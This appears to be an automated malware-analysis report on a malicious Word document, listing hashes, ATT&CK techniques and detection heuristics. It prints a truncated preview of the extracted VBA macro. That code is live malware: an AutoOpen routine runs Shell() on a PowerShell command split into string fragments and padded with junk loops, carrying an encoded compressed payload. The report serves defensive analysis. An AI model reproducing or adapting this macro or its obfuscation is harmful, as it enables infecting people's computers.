Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 082d868151e53330…

MALICIOUS

Office (OLE)

Size: 107.5 KB
Created: 2018-06-08 12:50:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 8ba7dba9b150e27c9f627b0d8dafad95
SHA-1: 5d2d814cb7b730727f97d85c785e68612e482cbb
SHA-256: 082d868151e53330f31cc3eeb3b4ff08757592cbf8aa42790839445edc1f5b6f
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine that calls a function which in turn invokes Shell(). That function assembles a command string at runtime and executes it, most likely to download and run a second-stage payload. The string is built as 'vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + hXUZAbip + dhiZTz + SjwCFiRXE', which appears to be an obfuscated way of launching a PowerShell command.

Heuristics (6)

  • VBA macros detected [medium; 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12616 bytes
SHA-256: 18f783f27469e7d652a1968a748478fe043e59aa693b91d40390695d960a83e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GrskhWwiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BjPltPav()
On Error Resume Next
For qqRiW = GhwVj To RsGzp
      For YAMGIQ = YWibTE To 48241
         KkaAsu = (88725 / CBool(rirzVT) - tTmha / Oct(66325 / Hex(86928) / hApwDb + Rnd(cRHWH / Fix(37))))
Next
   fzzwi = 30039 - 40577
Next
For QRXETl = jWwJR To tzCwqJ
      For CarwMt = UplwS To 46358
         RjStj = (80096 / CBool(vvJMqJ) - zuAnFj / Oct(48839 / Hex(81574) / YsaXnr + Rnd(BrsqcP / Fix(37))))
Next
   CHUoGf = 64246 - 73199
Next
BjPltPav = cjTLdQiMkzU + Shell(vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + jATWWtRft + hXUZAbip + dhiZTz + SjwCFiRXE, 67765 - 67765)
For kbUul = NojaJ To AJRJEK
      For VzSKj = zflvS To 21953
         mWpwSw = (97888 / CBool(dEHBGp) - wCiBU / Oct(47945 / Hex(31105) / RRkjo + Rnd(btQPQI / Fix(37))))
Next
   TVqILQ = 84446 - 86480
Next
End Function
Sub Autoopen()
On Error Resume Next
For IdWvj = QRrTVw To iiMKN
      For Kqmpj = fjntI To 15825
         fGJHN = (87205 / CBool(sczYzm) - vrIvBC / Oct(79514 / Hex(65678) / WnpWB + Rnd(dXiLz / Fix(37))))
Next
   RVazR = 32631 - 20123
Next
BjPltPav
For qOsutk = iwHFiz To mTYXvp
      For cploMd = hvkli To 111
         IvucRN = (97045 / CBool(aGOVj) - HbuVUi / Oct(28319 / Hex(46436) / FhGTw + Rnd(XTEzH / Fix(37))))
Next
   XduicB = 6659 - 28911
Next
End Sub


Attribute VB_Name = "aqznaUpQJRP"
Function mbhjLO()
On Error Resume Next
For sfkknb = FGBap To hkaiZ
      For qTLvQ = psKjNU To 90880
         wwPXXV = (70445 / CBool(kldJjp) - fiIVV / Oct(73261 / Hex(34702) / kTwziH + Rnd(tjfPN / Fix(37))))
Next
   VDLDlJ = 68172 - 49693
Next
rUdAbUdo = "HeLL -e IAAoAG" + "4AZQBX" + "AC0ATwBCAEoARQB" + "DAHQAIAAgAFMAe" + "QB" + "zAF" + "QAZQBtA"
For GHzoi = Ezaoj To fDbXC
      For OsziR = SKbzRj To 54746
         HSMozt = (55723 / CBool(phEah) - pzkjj / Oct(70869 / Hex(40131) / UcpXWU + Rnd(GhqLzH / Fix(37))))
Next
   rmZIv = 96071 - 6582
Next
DbozKaYhlw = "C4ASQBPAC4AQw" + "BPAG0AcABSAEUAc" + "wBTAGkATwBOAC4A" + "RABF" + "AGYAbABBAFQ" + "ARQBzAFQAcgBlA" + "EEAbQAo" + "AFsA"
For ZqvwU = NkArNa To kzaXIm
      For zOPjOc = wGapW To 57440
         CzcZz = (4623 / CBool(zqUkhP) - nzlnL / Oct(39995 / Hex(30785) / bLisT + Rnd(dZCqw / Fix(37))))
Next
   hzzzJk = 79839 - 4402
Next
tDLDfi = "UwB" + "ZAFMAdABF" + "AG0ALgBpAG" + "8AL"
For uzhNB = HpCLJ To rXQqGj
      For TQRtkW = nCnda To 60156
         mjMBi = (32801 / CBool(WjAfn) - qbjHC / Oct(1796 / Hex(22676) / HcFwrd + Rnd(FCYkd / Fix(37))))
Next
   FqEpbS = 48499 - 95307
Next
oJjbFO = "gBNAGUATQB" + "vA" + "FIAWQBzAHQ" + "AcgBlAG" + "EAbQB"
For ROzSiL = jaaTf To DGFnnh
      For jcuJc = kcRaim To 71213
         LrwYuL = (69128 / CBool(zKKwZ) - zkoisj / Oct(916 / Hex(79067) / opzbt + Rnd(ArjuF / Fix(37))))
Next
   PGOsVj = 19856 - 58614
Next
KzUiztjBnGr = "dAFsAcwBZ" + "AHMA" + "VABlAG0A" + "LgBjAG8AbgBWA" + "GUAUgBUAF0A" + "OgA6AGY" + "AUgBPAE0AYgB" + "BA" + "HMARQA2" + "ADQAUwB"
For zjLzfh = EuEZWY To jzkqI
      For TdCUui = ZlWAqK To 68559
         JmdOhN = (75742 / CBool(pfVqwf) - lpChQV / Oct(58783 / Hex(81817) / wDNSY + Rnd(jLoVa / Fix(37))))
Next
   Hcajf = 82658 - 23252
Next
pOGXJZJzfV = "0AHIAaQBOAEcAK" + "AAg" + "ACcAVgBa" + "AEIAdAB" + "UADgASgBB" + "AEQATQ" + "BlAC8AeQByADE" + "AWQ" + "BzAGkAMw"
For Zrhtql = ndSTi To aRdAVO
      For vJCaFj = NbzkiS To 2408
         FVUbmt = (91551 / CBool(VCvPjL) - jKcatP / Oct(79300 / Hex(13537) / GHzMjh + Rnd(MuwMHf / Fix(37))))
Next
   brAbjY = 19854 - 38483
Next
QiVKiZzuh = "BLAEw" + "AWQ" + "BaAEUAaABN" + "AFUARQBlAFQA" + "QQBZAE0AOABLAG" + "oAbwBEAEUAe" + "AB0ADEAdABoAEIA" + "KwBOAHU" + "AMwBoAF" + "UAS"
For BiNaCs = OPOjV To wjBnOj
      For kzpDR = isoIi To 56110
         KvhTHm = (38183 / CBool(iwtzXw) - RZsJaw / Oct(23599 / Hex(4394) / JIBJOa 
... (truncated)